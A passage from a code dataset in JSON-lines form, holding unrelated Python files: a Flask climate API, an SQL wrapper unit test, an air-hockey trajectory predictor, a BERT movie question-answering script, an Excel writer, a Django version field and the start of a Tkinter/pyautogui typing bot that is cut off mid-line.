\"\n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n \n # Query precipitation\n results = session.query(Measurement.date, Measurement.tobs).\\\n filter(Measurement.date >= \"2016-08-24\", Measurement.date <= \"2017-08-23\").\\\n all()\n\n prcp_data = [results]\n\n return jsonify(prcp_data)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n\n # Query stations\n results = session.query(Station.name, Station.station).all()\n\n station_data = []\n for result in results:\n station_dic = {}\n station_dic['name'] = result[0]\n station_dic['station'] = result[1]\n station_data.append(station_dic)\n \n return jsonify(station_data)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n \n # Query temperatures\n results = session.query(Measurement.date, Measurement.tobs).\\\n filter(Measurement.date >= \"2016-08-24\", Measurement.date <= \"2017-08-23\").\\\n all()\n\n tobs_data = []\n for result in results:\n tobs_dic = {}\n tobs_dic[\"Date\"] = result[0]\n tobs_dic[\"Temperature\"] = int(result[1])\n tobs_data.append(tobs_dic)\n\n return jsonify(tobs_data)\n\n@app.route('/api/v1.0//')\ndef any_date(date):\n \n results = session.query(func.avg(Measurement.tobs), func.max(Measurement.tobs), func.min(Measurement.tobs)).\\\n filter(Measurement.date >= date).all()\n\n data_list = []\n for result in results:\n data_dic = {}\n data_dic['Average Temperature'] = float(result[0])\n data_dic['Highest Temperature'] = float(result[1])\n data_dic['Lowest Temperature'] = float(result[2])\n data_list.append(data_dic)\n\n return jsonify(data_list)\n\n@app.route('/api/v1.0///')\ndef date_range(start, end):\n\n results = session.query(func.avg(Measurement.tobs), func.max(Measurement.tobs), func.min(Measurement.tobs)).\\\n filter(Measurement.date >= start, Measurement.date <= end).all()\n\n date_range = []\n for result in results:\n date_dic= {}\n date_dic[\"Start Date\"] = start\n date_dic[\"End Date\"] = end\n date_dic[\"Average Temperature\"] = float(result[0])\n date_dic[\"Highest Temperature\"] = float(result[1])\n date_dic[\"Lowest Temperature\"] = float(result[2])\n date_range.append(date_dic)\n \n return jsonify(date_range)\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"myun3378/Surfs-Up","sub_path":"climate_app.py","file_name":"climate_app.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"846635697","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\n\nimport sqlite3\n\nfrom jk_sql import *\n\n\n\n\n\ndb = DBManager.createSQLiteMemoryDB()\ntable = db.createTable(DBTableDef(\"mytable\", [\n\tDBColDef(\"rowidxxx\", EnumDBColType.PK, False, EnumDBIndexType.NONE),\n\tDBColDef(\"mybool\", EnumDBColType.BOOL, True, EnumDBIndexType.NONE),\n\tDBColDef(\"myint\", EnumDBColType.INT32, True, EnumDBIndexType.NONE),\n\tDBColDef(\"myfloat\", EnumDBColType.DOUBLE, True, EnumDBIndexType.NONE),\n\tDBColDef(\"mystr\", EnumDBColType.STR256, True, EnumDBIndexType.NONE),\n\tDBColDef(\"myblob\", EnumDBColType.BLOB, True, EnumDBIndexType.NONE),\n\tDBColDef(\"myclob\", EnumDBColType.CLOB, True, EnumDBIndexType.NONE),\n]))\n\n# insert\nprint(\"---- verify the insert\")\n\nfor n in range(0, 3):\n\ttable.addRow({\n\t\t\"mybool\": True,\n\t\t\"myint\": 123 + n,\n\t\t\"myfloat\": 1.23,\n\t\t\"mystr\": \"abc\" + str(n),\n\t\t\"myblob\": b\"\\x00\\x01\\x02\\x03\",\n\t\t\"myclob\": \"Lorem ipsum\",\n\t})\n\nprint(\"---- verify the insert\")\n\nrows = table.getRows()\nassert len(rows) == 3\nprint(rows[0])\nassert rows[0] == (1, True, 123, 1.23, \"abc0\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\nprint(rows[1])\nassert rows[1] == (2, True, 124, 1.23, \"abc1\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\nprint(rows[2])\nassert rows[2] == (3, True, 125, 1.23, \"abc2\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\n\nprint(\"---- verify counting\")\n\ncount = table.countRows()\nassert count == 3\n\ncount = table.countRows({\n\t\"mystr\": \"abc1\"\n})\nassert count == 1\n\ncount = table.countRows({\n\t\"myint\": 0\n})\nassert count == 0\n\nprint(\"---- delete\")\n\ntable.deleteRows({\n\t\"myint\": 124\n})\n\nprint(\"---- verify the delete\")\n\nrows = table.getRows()\nassert len(rows) == 2\nprint(rows[0])\nassert rows[0] == (1, True, 123, 1.23, \"abc0\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\nprint(rows[1])\nassert rows[1] == (3, True, 125, 1.23, \"abc2\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\n\nprint(\"---- update\")\n\ntable.updateRows({\n\t\"myint\": 123456789,\n\t\"myclob\": \"Lorem ipsum dolor\",\n\t\"mybool\": False,\n\t\"myfloat\": 1.234567,\n}, {\n\t\"myint\": 125\n})\n\nprint(\"---- verify the update\")\n\nrows = table.getRows()\nassert len(rows) == 2\nprint(rows[0])\nassert rows[0] == (1, True, 123, 1.23, \"abc0\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\nprint(rows[1])\nassert rows[1] == (3, False, 123456789, 1.234567, \"abc2\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum dolor\")\n\nprint(\"---- add another column\")\n\nbSuccess = -1\ntry:\n\ttable.addColumn(DBColDef(\"myvalue\", EnumDBColType.INT32, False, EnumDBIndexType.UNIQUE_INDEX))\n\tbSuccess = 1\nexcept:\n\t# this should fail\n\tbSuccess = 0\nassert bSuccess == 0\n\ntable.addColumn(DBColDef(\"myvalue\", EnumDBColType.INT32, False, EnumDBIndexType.INDEX))\n\nprint(\"---- verify the add column operation\")\n\nrows = table.getRows()\nassert len(rows) == 2\nprint(rows[0])\nassert rows[0] == (1, True, 123, 1.23, \"abc0\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\", 0)\nprint(rows[1])\nassert rows[1] == (3, False, 123456789, 1.234567, \"abc2\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum dolor\", 0)\n\nprint(\"---- remove column\")\n\ntable.removeColumn(\"myvalue\")\n\nprint(\"---- verify the remove column operation\")\n\nrows = table.getRows()\nassert len(rows) == 2\nprint(rows[0])\nassert rows[0] == (1, True, 123, 1.23, \"abc0\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\nprint(rows[1])\nassert rows[1] == (3, False, 123456789, 1.234567, \"abc2\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum dolor\")\n\nprint(\"---- verify distinct queries\")\n\ntable.addRow({\n\t\"mybool\": True,\n\t\"myint\": 123,\n\t\"myfloat\": 1.23,\n\t\"mystr\": \"abc0\",\n\t\"myblob\": b\"\\x00\\x01\\x02\\x03\",\n\t\"myclob\": \"Lorem ipsum\",\n})\n\nrows = table.getDistinct([ \"myint\" ])\nassert len(rows) == 2\nprint(rows[0])\nassert rows[0] == (123,)\nprint(rows[1])\nassert rows[1] == (123456789,)\n\nrows = table.getDistinct([ \"myint\", \"mystr\", \"myclob\" ])\nassert len(rows) == 2\nprint(rows[0])\nassert rows[0] == (123, \"abc0\", \"Lorem ipsum\")\nprint(rows[1])\nassert rows[1] == (123456789, \"abc2\", \"Lorem ipsum dolor\")\n\nprint(\"--- ALL TESTS SUCCEEDED.\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jkpubsrc/python-module-jk-sql","sub_path":"tests/unit-test.py","file_name":"unit-test.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15410169266","text":"import os\nimport math\nimport random\n\n\ndef pointDistance(x1,y1,x2,y2):\n distance = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n return distance\n\ndef interceptVector(slope,intercept,direction):\n minY = 0\n maxY = 300\n minX = -350\n maxX = 350\n\n xLow = (minY - intercept) / slope\n xHigh = (maxY - intercept) / slope\n\n if ((slope < 0) and (direction == \"right\")):\n interceptPoint = [xLow, minY] # bottom right\n elif ((slope > 0) and (direction == \"right\")):\n interceptPoint = [xHigh, maxY] # top right\n elif ((slope < 0) and (direction == \"left\")):\n interceptPoint = [xHigh, maxY] # top left\n elif ((slope > 0) and (direction == \"left\")):\n interceptPoint = [xLow, minY] # bottom left\n\n return interceptPoint\n\n\n\n\ndef algorithm(x1,y1,x2,y2):\n\n numOfReflections = 0\n\n puckARRAY = []\n\n finalPoint = \"\"\n finalPredict = \"\"\n\n\n\n if((x2-x1) >= 0):\n direction = \"right\"\n else:\n direction = \"left\"\n\n\n #calculate distance between the two points\n distance = pointDistance(x1,y1,x2,y2)\n\n #calculate slope between the two points\n if(x2 == x1):\n slope = 0\n upDown = True\n straight = False\n elif(y2 ==y1):\n slope = 0\n straight = True\n upDown = False\n else:\n slope = (y2 - y1) / (x2 - x1)\n straight = False\n upDown = False\n\n #calulcate intercept of the line\n intercept = y2 - (slope * x2)\n\n #boundaries of the table\n minX = -350\n maxX = 350\n\n interceptPointARRAY = []\n predictedPUCK_ARRAY = []\n\n\n #if the line is not going straight up/down or left/right\n if((straight == False)and (upDown == False)):\n\n #test the point at which the line will intercept with upper or lower boundary of table\n interceptPoint = interceptVector(slope,intercept,direction)\n\n #if intercept point exceeds boundary values then there will be no reflection\n #in other words, the line is pointing towards the goal line\n if((interceptPoint[0] > maxX) or (interceptPoint[0] < minX)):\n reflect = False\n else:\n reflect = True\n\n #if there's a reflection, calculate all theoretical bounce points\n #untiul you reach the goal\n if(reflect == True):\n numOfReflections = 0\n previousX = x2\n previousY = y2\n while(reflect == True):\n\n numOfReflections += 1\n interceptPointARRAY.append(interceptPoint)\n predictedPUCK_ARRAY.append([interceptPoint[0],interceptPoint[1]])\n\n x1Predict = previousX\n y1Predict = previousY\n\n x2Predict = interceptPoint[0]\n y2Predict = interceptPoint[1]\n\n #if theoretical intercept point = (x2,y2) then you don't need to calculate the distance\n #between theoretical point and (x2,y2)\n if((x1Predict == x2Predict) and (y1Predict == y2Predict)):\n distance = math.sqrt((x2Predict - float(x1)) ** 2 + (y2Predict - float(y1)) ** 2)\n theta = math.acos(float(abs(x2Predict-float(x1)) / distance))*(180/math.pi)\n\n else:\n distance = math.sqrt((x2Predict - x1Predict) ** 2 + (y2Predict - y1Predict) ** 2)\n theta = math.acos(float(abs(x2Predict-x1Predict)/distance))*(180/math.pi)\n\n if(direction == \"right\"):\n xDir = 50\n if(slope < 0):\n yDir = 50\n else:\n yDir = -50\n elif(direction == \"left\"):\n xDir = -50\n\n if(slope < 0):\n yDir = -50\n else:\n yDir = 50\n\n\n reflectionX = x2Predict + xDir * (math.cos(math.radians(theta)))\n reflectionY = y2Predict + yDir*(math.sin(math.radians(theta)))\n\n predictedPUCK_ARRAY.append([reflectionX,reflectionY])\n\n previousX = x2Predict\n previousY = y2Predict\n\n slope = ((reflectionY - y2Predict) / (reflectionX - x2Predict))+0.001\n intercept = reflectionY - (slope * reflectionX)\n if ((reflectionX - x2Predict) >= 0):\n direction = \"right\"\n else:\n direction = \"left\"\n\n interceptPoint = interceptVector(slope,intercept,direction)\n\n if ((interceptPoint[0] > 350) or (interceptPoint[0] < -350)):\n reflect = False\n else:\n reflect = True\n\n if (direction == \"right\"):\n finalPoint = [maxX, slope * maxX + intercept]\n elif (direction == \"left\"):\n finalPoint = [minX, slope * minX + intercept]\n\n # draw point on graph indicating final point\n finalPredict = [finalPoint[0],finalPoint[1]]\n\n\n #if there's no reflection, calculate final point\n elif(reflect == False):\n if(direction == \"right\"):\n finalPoint = [maxX,slope*maxX + intercept]\n elif(direction == \"left\"):\n finalPoint = [minX,slope*minX + intercept]\n\n #draw point on graph indicating final point\n finalPredict = [finalPoint[0], finalPoint[1]]\n\n #calculate final point for straight line trajectory\n #this is a different case than the one above\n elif(straight == True):\n if (direction == \"right\"):\n finalPoint = [maxX, slope * maxX+ intercept]\n elif (direction == \"left\"):\n finalPoint = [minX, slope * minX + intercept]\n\n #draw point on graph indicating final point\n finalPredict = [finalPoint[0], finalPoint[1]]\n\n #remove final point and restart loop, receiving an updated position of puck\n #if(finalPredict):\n # print(\"IMPACT POINT at: {}\".format(finalPoint))\n\n\n try:\n if(numOfReflections > 1):\n return(-900,-900)\n else:\n return (finalPoint[0], finalPoint[1])\n except IndexError:\n return (-900,-900);\n\n","repo_name":"ChargerAirHockey/PIDRobot","sub_path":"PIDcode.py","file_name":"PIDcode.py","file_ext":"py","file_size_in_byte":6179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"814670348","text":"import pandas as pd\nfrom nltk.stem import WordNetLemmatizer\nwordnet_lemmatizer = WordNetLemmatizer()\nfrom nltk.corpus import stopwords\nimport string\nstring.punctuation\nstop = stopwords.words('english')\nfrom nltk.stem.porter import PorterStemmer\nporter_stemmer = PorterStemmer()\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport torch\nfrom transformers import BertTokenizer, BertForQuestionAnswering\n\npd.set_option('display.max_rows', 10)\npd.set_option('display.max_columns', 10)\npd.set_option('display.width', 1000)\n\n\nmovies = pd.read_csv(\"movies_metadata.csv\", delimiter=';', encoding= \"ISO-8859-1\")\n# Removing last 40000 rows\nmovies = movies.iloc[:-40000]\n\ndef remove_punctuation(text):\n punctuationfree=\"\".join([i for i in text if i not in string.punctuation])\n return punctuationfree\n\n#storing the puntuation free text\nmovies['overview']= movies['overview'].astype(str).apply(lambda x:remove_punctuation(x))\nmovies['overview']= movies['overview'].apply(lambda x: x.lower())\nmovies['overview_without_stopwords'] = movies['overview'].apply(lambda x: ' '.join([word for word in x.split() if word not in (stop)]))\n#movies[\"token\"] = movies[\"overview_without_stopwords\"].apply(word_tokenize)\nprint(movies.head())\n\ndocs = movies['overview_without_stopwords']\n\n\ndef get_top_k_articles(query, docs, k=2):\n # Initialize a vectorizer that removes English stop words\n vectorizer = TfidfVectorizer(analyzer=\"word\", stop_words='english')\n\n # Create a corpus of query and documents and convert to TFIDF vectors\n query_and_docs = [query] + docs\n matrix = vectorizer.fit_transform(query_and_docs)\n\n # Holds our cosine similarity scores\n scores = []\n print(scores)\n\n # The first vector is our query text, so compute the similarity of our query against all document vectors\n for i in range(1, len(query_and_docs)):\n scores.append(cosine_similarity(matrix[0], matrix[i])[0][0])\n\n # Sort list of scores and return the top k highest scoring documents\n sorted_list = sorted(enumerate(scores), key=lambda x: x[1], reverse=True)\n top_doc_indices = [x[0] for x in sorted_list[:k]]\n top_docs = [docs[x] for x in top_doc_indices]\n\n return top_docs\n\nmodel = BertForQuestionAnswering.from_pretrained('bert-large-uncased-whole-word-masking-finetuned-squad')\ntokenizer = BertTokenizer.from_pretrained('bert-large-uncased-whole-word-masking-finetuned-squad')\n\n\ndef answer_question(question, answer_text):\n input_ids = tokenizer.encode(question, answer_text, max_length=512)\n\n # ======== Set Segment IDs ========\n # Search the input_ids for the first instance of the `[SEP]` token.\n sep_index = input_ids.index(tokenizer.sep_token_id)\n\n # The number of segment A tokens includes the [SEP] token istelf.\n num_seg_a = sep_index + 1\n\n # The remainder are segment B.\n num_seg_b = len(input_ids) - num_seg_a\n\n # Construct the list of 0s and 1s.\n segment_ids = [0] * num_seg_a + [1] * num_seg_b\n\n # There should be a segment_id for every input token.\n assert len(segment_ids) == len(input_ids)\n\n outputs = model(torch.tensor([input_ids]), # The tokens representing our input text.\n token_type_ids=torch.tensor([segment_ids]),\n # The segment IDs to differentiate question from answer_text\n return_dict=True)\n\n start_scores = outputs.start_logits\n end_scores = outputs.end_logits\n\n # ======== Reconstruct Answer ========\n # Find the tokens with the highest `start` and `end` scores.\n answer_start = torch.argmax(start_scores)\n answer_end = torch.argmax(end_scores)\n\n # Get the string versions of the input tokens.\n tokens = tokenizer.convert_ids_to_tokens(input_ids)\n\n # Start with the first token.\n answer = tokens[answer_start]\n\n # Select the remaining answer tokens and join them with whitespace.\n for i in range(answer_start + 1, answer_end + 1):\n\n # If it's a subword token, then recombine it with the previous token.\n if tokens[i][0:2] == '##':\n answer += tokens[i][2:]\n\n # Otherwise, add a space then the token.\n else:\n answer += ' ' + tokens[i]\n\n print('Answer: \"' + answer + '\"')\n\n# Enter our query here\nquery = \"Who Woody the toy?\"\n#query = \"What else does the bassist for Death From Above play?\"\n#query = \"What projects is Jesse Keeler involved in?\"\n\n# Segment our documents\n#segmented_docs = segment_documents(docs, 450)\n\n# Retrieve the top k most relevant documents to the query\ncandidate_docs = get_top_k_articles(query, docs, 3)\n\n# Return the likeliest answers from each of our top k most relevant documents in descending order\nfor i in candidate_docs:\n answer_question(query, i)\n print (\"Reference Document: \", i)\n\n","repo_name":"stickfrosch/NLP_Movies_Summary","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21279550124","text":"#11. Creating class of a watch\n\nclass Watch:\n #state\n def __init__(self, brand, model, price, color):\n self.brand = brand\n self.model = model\n self.price = price\n self.color = color\n\n #behaviour\n def details(self):\n print(\"Details of the watch: \", self.brand, self.model, self.price, self.color)\n\nSpecifications = Watch(\"Rolex\", \"1987 pre-owned Cosmograph Daytona 40mm\", \"Rs.2,27,11,709\", \"Yellow Gold\")\nSpecifications.details()\n","repo_name":"shettymodernchipsolutions/Python","sub_path":"_12_OOPS/Self_Notes/_03_Fields&Methods/Class/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24113502788","text":"from logging_err import Logger\nimport pandas as pd\nfrom openpyxl import load_workbook, Workbook\nimport os\nfrom fill_style import Style_pandas\nimport shutil\nfrom formating import Formating\nfrom copy import copy\nfrom openpyxl.utils import FORMULAE\n\n\nclass Excel():\n\n def __init__(self):\n self.log = Logger()\n self.log.message_debug(\"Create class Write_data\")\n self.sp = Style_pandas()\n self.fm = Formating()\n self.ido = 1\n # self.dp=Data_preparation()\n\n def CustomParser(self, data):\n import ast\n res = ast.literal_eval(data)\n print(res)\n # import json\n # n = json.dumps(data)\n # j1 = json.loads(n)\n return res\n\n def read_xlsx_load_workbook(self, path, file_name, sheet_name='Лист1'):\n wb = load_workbook(filename=os.path.join(path, file_name), read_only=True)\n ws = wb[sheet_name]\n DataFrame = pd.DataFrame()\n for row in ws.iter_rows():\n DataFrame=DataFrame.append(pd.Series([cell.value for cell in row]),ignore_index=True)\n DataFrame = pd.DataFrame(DataFrame.values[1:], columns=DataFrame.iloc[0])\n wb.close()\n return DataFrame\n\n def read_xlsx_pandas(self, path, file_name, sheet_name='Лист1'):\n\n try:\n DataFrame = pd.read_excel(os.path.join(path, file_name), sheet_name=sheet_name, engine='openpyxl',\n data_only=False)\n # DataFrame=DataFrame.replace('\\'','',regex=True)\n # DataFrame.Sum.str.upper()\n # i=DataFrame.Sum.str.replace('_', '',regex=True)\n # DataFrame=DataFrame.dropna(how='all')\n\n except Exception as e:\n self.log.message_error(e)\n return 0\n return DataFrame\n\n def create_marks(self, descript, list_mark):\n for row in descript.iter_rows(max_row=22):\n for cell in row:\n mark = str(cell.value).partition(\"~\")[2].partition(\"~\")[0]\n if mark in list_mark:\n mark_in_excel = {'startcol': cell.column, 'startrow': cell.row}\n yield mark, mark_in_excel.values()\n\n def create_xlsx(self, path='', original_file='template.xlsx', copy_file='document.xlsx'):\n shutil.copyfile(os.path.join(path, original_file),\n\n os.path.join(path, copy_file))\n main_path = os.path.join(path, copy_file)\n primary = load_workbook(main_path)\n primary.add_named_style(self.fm.template_format())\n primary.add_named_style(self.fm.template_format1())\n primary.save(main_path)\n primary.close()\n\n def add_sheet_to_xlsx(self, path='', file_name='', new_title=''):\n main_path = os.path.join(path, file_name)\n primary = load_workbook(main_path)\n ws = primary.get_sheet_by_name('ПрайсПО')\n primary.copy_worksheet(ws)\n self.ido += 1\n wss = primary.worksheets[self.ido]\n wss.title = new_title\n primary.save(main_path)\n return primary\n\n def write_to_excel(self, mv, DataFrame, path='', file_name='document.xlsx', list_columns=None, sheet=''):\n if sheet == '':\n list_sheet = dict(map(lambda ws: (ws.title, ws), mv.worksheets))\n else:\n list_sheet = [sheet]\n for sheet in list_sheet:\n get_descript_sheet = mv[sheet]\n tmp_startrow = 0\n for mark, (startcol, startrow) in self.create_marks(get_descript_sheet, list_columns):\n self.log.message_debug(\"Finde mark: {}\".format(mark))\n if startrow != tmp_startrow and len(DataFrame.index) > 1:\n tmp_startrow = startrow\n get_descript_sheet.insert_rows(startrow + 1, len(DataFrame))\n\n for index, row in enumerate(DataFrame.loc[:, [mark]].iterrows()):\n if type(get_descript_sheet.cell(row=startrow + index, column=startcol)).__name__ != 'MergedCell':\n cell = get_descript_sheet.cell(row=startrow, column=startcol)\n new_cell = get_descript_sheet.cell(row=startrow, column=startcol).offset(row=index, column=0)\n\n from openpyxl.formula.translate import Translator\n from openpyxl.formula import Tokenizer\n tok = Tokenizer(str(row[1][mark]))\n if tok.formula.startswith('='):\n new_cell.value = Translator(row[1][mark], origin=cell.coordinate).translate_formula(\n row_delta=startrow-2)\n else:\n new_cell.value = row[1][mark]\n\n if cell.has_style:\n new_cell.font = copy(cell.font)\n new_cell.border = copy(cell.border)\n new_cell.fill = copy(cell.fill)\n new_cell.number_format = copy(cell.number_format)\n new_cell.protection = copy(cell.protection)\n new_cell.alignment = copy(cell.alignment)\n for key, col, style in self.sp.pars_style_from_dataframe(DataFrame.iloc[index]['Format']):\n if col == mark:\n if key == 'style':\n get_descript_sheet.cell(row=startrow + index, column=startcol).style = style\n if key == 'merge_cell':\n get_descript_sheet.merge_cells(start_row=startrow + index, start_column=startcol,\n end_row=startrow + index + style[1],\n end_column=startcol + style[0])\n if key == 'hide':\n get_descript_sheet.row_dimensions[startrow + index].hidden = True\n new_cell.value = style\n\n mv.save(os.path.join(path, file_name))\n # mv.close()\n self.log.message_debug(\"Write file: {}\".format(path))\n","repo_name":"4ndriesh/calc_report","sub_path":"app/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":6179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71542542224","text":"from builtins import str\nfrom past.builtins import basestring\nfrom future.utils import python_2_unicode_compatible\n\nimport django\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\n\nfrom .constants import DEFAULT_NUMBER_BITS\nfrom .version import Version\nfrom .utils import convert_version_string_to_int, convert_version_int_to_string\nfrom . import forms\n\nif django.VERSION[:2] <= (1, 7):\n from django.utils.six import with_metaclass\n\n\n class BaseField(with_metaclass(models.SubfieldBase, models.BigIntegerField)):\n def to_python(self, value):\n if isinstance(value, Version):\n return int(value)\n\n if isinstance(value, basestring):\n return Version(value, self.number_bits)\n\n if value is None:\n return None\n\n return Version(convert_version_int_to_string(value, self.number_bits), self.number_bits)\nelse:\n class BaseField(models.BigIntegerField):\n def from_db_value(self, value, *args, **kwargs):\n if isinstance(value, Version):\n return int(value)\n\n if isinstance(value, basestring):\n return Version(value, self.number_bits)\n\n if value is None:\n return None\n\n return Version(convert_version_int_to_string(value, self.number_bits), self.number_bits)\n\n def to_python(self, value):\n if isinstance(value, Version):\n return int(value)\n\n if isinstance(value, basestring):\n return Version(value, self.number_bits)\n\n if value is None:\n return None\n\n return int(Version(convert_version_int_to_string(value, self.number_bits), self.number_bits))\n\n\nclass VersionField(BaseField):\n \"\"\"\n A Field where version numbers are input/output as strings (e.g. 3.0.1)\n but stored in the db as converted integers for fast indexing\n \"\"\"\n description = \"A version number (e.g. 3.0.1)\"\n\n def __init__(self, number_bits=DEFAULT_NUMBER_BITS, *args, **kwargs):\n self.number_bits = number_bits\n super(VersionField, self).__init__(*args, **kwargs)\n\n def get_prep_value(self, value):\n if isinstance(value, basestring):\n try:\n return int(Version(value, self.number_bits))\n except ValueError:\n max_value = '.'.join([str(2 ** e - 1) for e in self.number_bits])\n raise ValidationError(\"Max version is {0}\".format(max_value))\n\n if value is None:\n return None\n\n return int(value)\n\n def formfield(self, **kwargs):\n defaults = {\n 'form_class': forms.VersionField,\n 'number_bits': self.number_bits\n }\n defaults.update(kwargs)\n return super(VersionField, self).formfield(**defaults)\n\n @python_2_unicode_compatible\n def __str__(self, value):\n return str(value)\n\n\ntry:\n from south.modelsinspector import add_introspection_rules\n\n rules = [\n (\n (VersionField,),\n [],\n {\n \"number_bits\": [\"number_bits\", {\"default\": DEFAULT_NUMBER_BITS}],\n },\n )\n ]\n add_introspection_rules(rules, [\"^versionfield\"])\nexcept ImportError:\n # looks like we aren't using south\n pass\n","repo_name":"Crystalnix/django-versionfield3","sub_path":"versionfield/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"47"} +{"seq_id":"7081391187","text":"from random import randint\r\nimport pyautogui\r\nimport time\r\nimport tkinter as tk\r\nimport tkinter.font as tkFont\r\nfrom tkinter import ttk\r\nfrom tkinter import *\r\nimport pyperclip\r\n# import urllib.request\r\n# import urllib.parse\r\n# import re\r\nimport sys\r\n\r\n# This is an old program I worked on just for fun, and I came back to it because a friend of mine wanted it.\r\n# I scrapped some unfinished features (checking for updates, pause and resume buttons).\r\n# But I recently added word/line checkboxes to define what mod will be used.\r\n# I'll improve this project this if people seem to be interested in it.\r\n\r\nLARGE_FONT = (\"Verdana\", 12)\r\nNORM_FONT = (\"Helvetica\", 10)\r\nSMALL_FONT = (\"Helvetica\", 8)\r\n\r\n'''\r\ndef popupmsg(msg):\r\n popup = tk.Tk()\r\n popup.iconbitmap('icon.ico')\r\n\r\n popup.resizable(False, False)\r\n window_height = 200\r\n window_width = 400\r\n screen_width = popup.winfo_screenwidth()\r\n screen_height = popup.winfo_screenheight()\r\n x_cordinate = int((screen_width / 2) - (window_width / 2))\r\n y_cordinate = int((screen_height / 2) - (window_height / 2))\r\n popup.geometry(\"{}x{}+{}+{}\".format(window_width, window_height, x_cordinate, y_cordinate))\r\n\r\n popup.wm_title(\"YO!\")\r\n\r\n label = ttk.Label(popup, text=msg, width=50, font=LARGE_FONT, anchor=\"center\")\r\n label.place(relwidth=1, relheight=0.2, relx=0.0, rely=0.007)\r\n\r\n sub = ttk.Label(popup, text=\"Send me a message on Discord for the update!\", width=50, font=NORM_FONT,\r\n anchor=\"center\")\r\n sub.place(relwidth=1, relheight=0.2, relx=0.0, rely=0.25)\r\n\r\n B1 = ttk.Button(popup, text=\"Continue\", width=10, command=popup.destroy)\r\n B1.place(relheight=0.3, relwidth=.5, relx=0.5, rely=0.7, anchor=\"center\")\r\n\r\n popup.mainloop()\r\n'''\r\n\r\n\r\ndef thanks():\r\n popup = tk.Tk()\r\n # popup.iconbitmap('icon.ico')\r\n\r\n popup.resizable(False, False)\r\n window_height = 200\r\n window_width = 400\r\n screen_width = popup.winfo_screenwidth()\r\n screen_height = popup.winfo_screenheight()\r\n x_cordinate = int((screen_width / 2) - (window_width / 2))\r\n y_cordinate = int((screen_height / 2) - (window_height / 2))\r\n popup.geometry(\"{}x{}+{}+{}\".format(window_width, window_height, x_cordinate, y_cordinate))\r\n\r\n popup.wm_title(\"Thank you!\")\r\n\r\n label = ttk.Label(popup, text=\"App Made by CJ\", width=50, font=LARGE_FONT, anchor=\"center\")\r\n label.place(relwidth=1, relheight=0.2, relx=0.0, rely=0.007)\r\n\r\n sub = ttk.Label(popup, text=\"Thank you for using Script Bot. Have fun!\", width=50, font=NORM_FONT, anchor=\"center\")\r\n sub.place(relwidth=1, relheight=0.2, relx=0.0, rely=0.25)\r\n\r\n B1 = ttk.Button(popup, text=\"Continue\", width=10, command=popup.destroy)\r\n B1.place(relheight=0.3, relwidth=.5, relx=0.5, rely=0.7, anchor=\"center\")\r\n\r\n popup.mainloop()\r\n\r\n\r\n'''\r\nrespData = \"\"\r\n\r\ntry:\r\n url = ''\r\n headers = {}\r\n headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) ' \\\r\n 'Chrome/35.0.1916.47 Safari/537.36 '\r\n req = urllib.request.Request(url, headers=headers)\r\n resp = urllib.request.urlopen(req)\r\n respData = resp.read()\r\n\r\n saveFile = open('withHeaders.txt', 'w')\r\n saveFile.write(str(respData))\r\n saveFile.close()\r\n \r\n\r\nexcept Exception as e:\r\n a = str(e)\r\n # print(str(e))\r\n\r\nupdateCheck = re.findall(r'
(.*?)
